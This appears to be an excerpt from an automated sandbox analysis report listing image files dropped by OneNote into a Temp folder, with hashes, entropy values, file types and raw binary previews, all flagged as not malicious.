                                                                                                                                                                                                                  Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.|.y|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<.*.....{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy*..ET.PM...c....~(.g..**...ol.K......Sc8..q.F.KM"<...:t.O.>b..$*t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@*D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`....*........M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{BAB609D6-1F10-403F-A859-1FE569CF0CFC}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):3879
                                                                                                                                                                                                                  Entropy (8bit):7.9281351307465044
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                                                                                                                                  MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                                                                                                                                  SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                                                                                                                                  SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                                                                                                                                  SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..*U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....|;..gy+.[..,...o...p..2.%..B.Y....|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+**.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..|.l{..72.....zv@.#.<.........../....F|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{BBFE1C4F-097D-454B-8957-AC5B926C841D}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1924
                                                                                                                                                                                                                  Entropy (8bit):7.836744258175623
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
                                                                                                                                                                                                                  MD5:B1FDE66F75507567B5F0C6C07B01A3A1
                                                                                                                                                                                                                  SHA1:80B8E6A923E853232F66C874367E90B5C9CAD7AE
                                                                                                                                                                                                                  SHA-256:B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
                                                                                                                                                                                                                  SHA-512:FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M*..J.....".4*....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o|.?.......;C|.#.../v.H.......o~.{G......H.|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O|.D...

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{BEAD5058-4BD1-4E54-AD25-B228B0F015DE}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):40884
                                                                                                                                                                                                                  Entropy (8bit):7.545929039957292
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:768:MCBOA4d+ElOXJ/3pI7cRBiL7L6qERqGz65WXzZqJsKQSbIsTT6XB:hIAU+2cGdLX6qBG4WDZl4Ihx
                                                                                                                                                                                                                  MD5:7379775A1E2AB7FAB95CFFCE01AE05F3
                                                                                                                                                                                                                  SHA1:3D3DDFD8AC7E07203561BAE423D66F0806833AB3
                                                                                                                                                                                                                  SHA-256:9301DB6D2D87282FCEE450189AEACE16D85F64273BF62713A3044992B6B7A9E9
                                                                                                                                                                                                                  SHA-512:4B5006E620E80D3A146944649CF4CA619782CAD7E8C4CD0D1DE0EBCA0FA05EACB7378DAFCEED3E26F5698B07F19604614D906C8F51F898660E2F129D8DEC6F62
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!.1A.....Qaq....".....2....BR#S..br...3T...C$.7(Hx....4D.G..Xh.cs..'..t...%...8.....................1...!AQ..a...q"2.4Tt.......R3S....Br...#s...Uu.bc.de..$D..6..C%E..............?...z...;sB.yv...........]t.\...n...../....m....M.=.3G+..x+.....S).*&.J../..8..O/+..sG...p...<!....~.c..C.w..,[oHom.wc-.J.~.......L[..6...'..i_..S;...!Y.z.q].EK..M.x...i.x.+.;.+...}....#......f.)........e6V..p.;........s.)..Ml.J......IU.6...<9+9.^..l..Y...[._...2..^..j.ia...._..3.;...~..<3...;......z.^.......]..Qk.,...Yk...3.3Jy^p.}....q...I...&..t.......;..9.g.GH;..'...%...)..[..y..../...zCn..>...'...1e.Y..;....]..7...N>t..m-.j.............H^..T\.q.ru...}...eTn]I'r.^].#..wOY....v

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{C007B14E-2899-49D0-B272-E7D44BC923DE}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 60 x 336, 4-bit colormap, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):347
                                                                                                                                                                                                                  Entropy (8bit):6.85024426015615
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6:6v/lhPtnlx/QulkWNY2V18A6Akp7eee1VDjMHCyLezyKUX5Gp:6v/7RrIubiA6AkpNhiyKe+
                                                                                                                                                                                                                  MD5:78762C169F8B104CB57DFF5A1669D2DF
                                                                                                                                                                                                                  SHA1:9638B71B584CD636834016A635ABF8D9C0887711
                                                                                                                                                                                                                  SHA-256:E64FDCD0B108737D8B8F7B677029F924031D6BBAA50585D9C3DEF7C7E92ECAF2
                                                                                                                                                                                                                  SHA-512:5ED899AAF73B72DEC32E171FFA112382667D5BF3FBA98C92E313E66C0A6975EA97068F4CD32B62283F18DBD5345C11E3610F7EEAC2F2DE71FC44593180B9CEAC
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...<...P.............PLTE......................=l......bKGD....H....cmPPJCmp0712....Om......IDATh......@..aI...B..C..l...^.%.`....>.]..|0.....a...hb...0......q.......p"....;...K..x=...p...y.yy~J....|...\.......y..X.......'...>1...Ky..f....&........N`..f0..b...3.......`Z.3..3.....o.......4.&........SV...4.....IEND.B`.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{C137B77B-9F28-4D5E-99C5-52CD342E33EC}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:18:09], progressive, precision 8, 164x641, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):27862
                                                                                                                                                                                                                  Entropy (8bit):7.238903610770013
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:LTawAZvhbrXzDc6LERLQ/b5vXOl6pXQ/wD5OUMrdRUUhCplQg0ESSz:6wm/vT/b4wxoqbdUhWnSs
                                                                                                                                                                                                                  MD5:E62F2908FA5F7189ED8EEBD413928DEE
                                                                                                                                                                                                                  SHA1:CA249B4A70924B73BDA52972E9C735AEC35A0C5D
                                                                                                                                                                                                                  SHA-256:20ABE389C885E42B6EBE9E902976229BB6FD63C8C34CB61AA70B8B746209F90A
                                                                                                                                                                                                                  SHA-512:EE8D1821A918BE8714F431895E7223D08036E88A4FDB9A5485EFF246640EE969A69A8AA4E2E9DDC35BA75FB6D4E95092A286E90B477BD6998C313639C2C31F25
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:18:09......................................................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................!.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..P.v..+..n(a..Q..S\6....Y....D......} w#.b..]l.5.RU..k...... ]$.$.........f........?.z@2uU...7....?..|.Q..I.&.. ......"T4)wdH.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{C29E0BB1-DF9C-4DA0-A545-4A816298CF44}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):55804
                                                                                                                                                                                                                  Entropy (8bit):7.433623355028275
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:gVvci05lhVbfBcWvBLeynluexaWqzww/u5:gVUZhHDljaHww/u5
                                                                                                                                                                                                                  MD5:4126992F65FE53D3E3E78F6B27FD49DC
                                                                                                                                                                                                                  SHA1:BC0D76B69310DA9B909D3EE4CECBFE5F386BFB45
                                                                                                                                                                                                                  SHA-256:3FBE3C1C238BD7DBC67F8CFF5F3BDDFD513C96A9851B9616477947D21DFF4B2E
                                                                                                                                                                                                                  SHA-512:624853F5E56D224C8188F122B2C4724F867D4099E7FAAFB9C945BE7E2907900ADCF4AE97AB08909CF94E96FB6F381E3B6396D560D93EB2731E4E69CBFE628F10
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d..............................................................................................!1...AQ.aq"2.....BR..8x..r#..9b....3....CS$.'.cs.......7Gw.(.4%5&..Wg.h......tEVfv..H..........................!1A..Qa.q...."2..u6....BRr.#...b..3s..d...7.Cc.$Tt..S4.5Ue..&..%.................?...,...8..{..S.y.N....%..q.8..H[5....o..xg........)c(.eO.YO..._D..x.U.....%.S.r.r._.^..Su.h.Q.t.:.#?....x..B.S...Q.....oqF..%..8'.qx....%.2JKjF..{y.w0.*a.RMb.c.Q{%....eW'..[IV..'ZW3...[...MN.....rO.:....$.i..7....Vrrr...I.r..M..Qo..j....q.^...N...J......%.J..)F...>$.....u........o...+......[...*..t....R}.I..R..S..GB..:......).6_[^Xft...F.1.....zP....,.#....MG.T..Q.F.....)Fi../.I...,%.voEb.b.Z..V3..FT.}..[Z{....wd.z.e.....QwW(.).t..\..'....:)<W.<..&k...caRT.X(..K.....:f...]...q..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{C2F44FBF-82C5-4F52-8D20-A803C31DBE0C}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:06:24], progressive, precision 8, 38x792, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):22203
                                                                                                                                                                                                                  Entropy (8bit):6.977175130747846
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:5q3R1VBvq3R1Flrk6Q0QPJJrR39joOVMJ25d1NkMhIwobbtAAAqYnLJZMJYZ2AC:xw6Q0WJR3FoOVMJIIlAAAqYnMJdD
                                                                                                                                                                                                                  MD5:2D3128554F6286809B2C8E99DE5FD3F6
                                                                                                                                                                                                                  SHA1:FC42CB04151D36F448093BDEFE33031A9B8D797D
                                                                                                                                                                                                                  SHA-256:14FA2D16310485AA1CE41F6D774A3D637E8CF8B03C4F72990155DF274FDB6BD9
                                                                                                                                                                                                                  SHA-512:D8531247A6E89ECABEA9C4A78F596CCE3493334EDF71AE4F7998FDDD0F80705948609C89756AB56FDFAB6D04DEC5F699A693801A772CA2EE2465BDD2CE5D2D5A
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....H.H.....XExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:06:24............................&.........................................................(.....................&...........*.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...H.....Go.Kxn.b..g...........%?_....O......q......7G......%%.V..8zm.].v?...jJ~._..>.......O;........o..rI.A.....n.a.........

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{C49BE421-4034-4505-B96C-D6904CA84A0A}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):19235
                                                                                                                                                                                                                  Entropy (8bit):7.944867159042578
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                                                                                                                                  MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                                                                                                                                  SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                                                                                                                                  SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                                                                                                                                  SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.*!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=|z7.Z.|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'*..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.*u.j..S.C=...|.....2..(YF........|...*.7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{C5019AF7-7D98-4364-8F53-2C6662EF1A82}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2210
                                                                                                                                                                                                                  Entropy (8bit):7.86853667196985
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                                                                                                                                  MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                                                                                                                                  SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                                                                                                                                  SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                                                                                                                                  SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B|CW......sO..\.=..&3...,.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{C5B2FC42-8C55-428D-8B58-D86F7DCE1A98}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13737
                                                                                                                                                                                                                  Entropy (8bit):7.916899917415529
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
                                                                                                                                                                                                                  MD5:830632032C7DDBCCDE126F4BAE935540
                                                                                                                                                                                                                  SHA1:9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
                                                                                                                                                                                                                  SHA-256:2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
                                                                                                                                                                                                                  SHA-512:5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{C6B689E9-00BB-4FC0-97F6-B069A8992604}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):19235
                                                                                                                                                                                                                  Entropy (8bit):7.944867159042578
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                                                                                                                                  MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                                                                                                                                  SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                                                                                                                                  SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                                                                                                                                  SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.*!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=|z7.Z.|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'*..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.*u.j..S.C=...|.....2..(YF........|...*.7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{C7D0C416-0233-45EB-A7CA-91B015272A74}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2210
                                                                                                                                                                                                                  Entropy (8bit):7.86853667196985
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                                                                                                                                  MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                                                                                                                                  SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                                                                                                                                  SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                                                                                                                                  SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B|CW......sO..\.=..&3...,.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{C8AA9356-1AEB-4900-B7FD-86BB97AA209E}.bin

                                                                                                                                                                                                                  Download File
